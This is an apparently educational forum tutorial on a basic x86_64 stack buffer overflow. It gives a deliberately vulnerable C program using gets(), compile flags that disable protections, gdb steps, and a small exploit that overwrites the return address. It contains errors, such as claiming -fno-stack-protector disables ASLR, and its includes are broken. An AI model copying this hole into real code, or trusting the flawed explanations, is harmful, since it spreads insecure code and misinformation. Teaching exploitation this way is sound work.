Tutorial: Basic Buffer Overflow

September 1, 2015 | Views: 4380

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

// Hey guys, today, I will give you a brief introduction to buffer overflows on Linux x86_64 machines.
// So, let’s start with a basic example in C:
______________________________________________________________________________________________________________
// First some standard includes, you should now them…
#include
#include
#include

// we create a vulnerable function
int vulnFunction(int a, int b)
{
// it creates a buffer with a size of 128 bytes! Yes, 128 not 125; it uses multiples of 8!
char Buffer1[125];

// now we get some input that could be greater than the buffer
gets(Buffer1);

// and a pointer to the buffer will be returned
return strdup(Buffer1);
}

int main()
{
vulnFunction(0,1);
}

// This will never be called…
void Unused()
{
printf(“Hacked!”);
exit(0);
}
______________________________________________________________________________________________________________
Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack
-zexecstack is to change the read & write mode of the stack to executable
-fno-stack-protector is for simplicity; it disables the randomization of the stack
(called address space layout randomization = ASLR)

Q: So, what happens if we give an input greater than the buffer?
A: It overrides everything from the beginning of the buffer until buffer begins + length of input;

Let’s try it out:
perl -e ‘print “A”x220 | ./first_vuln #to much input…
Yeah it crashes….
Now we start gdb to find some values:
gdb -q ./first_vuln
Disassemble the Unused function to get its start address
disas Unused

Now, you should search for something like this
Dump of assembler code for function Unused:
0x000000000040061c : push %rbp // this will be the new return address…

The stack is built like this:
rip
rbp register
buffer[128]

Ok, we have our info. We need 128bytes for the buffer and 8 for the rbp register. After that, the rip begins.
We need to overwrite the complete buffer and the rbp register and append a new return address…

#include
#include
#include

int main(char *argv[])
{
int i = 0;
for (i=0;i<34;i++)
printf(“1337”);

unsigned RIP = 0x000000000040061c;//0x000000000040061c;
fwrite(&RIP,1,4,stdout);

return 0;
}

Simply compile the exploit and run it like this:
./first_exploit | ./first_vuln

 

Have fun, and maybe you should read some more tutorials on buffer overflows.

 

Greets,

AnonOverflow

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
1 Comment
  1. in this example you are just redirecting executing flow to the hacked print function right?

Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 299 / December 14, 2019
How do I Get MTA Certified?
Views: 895 / December 12, 2019
How much does your PAM software really cost?
Views: 1346 / December 10, 2019
How Do I Get into Android Development?
Views: 1725 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel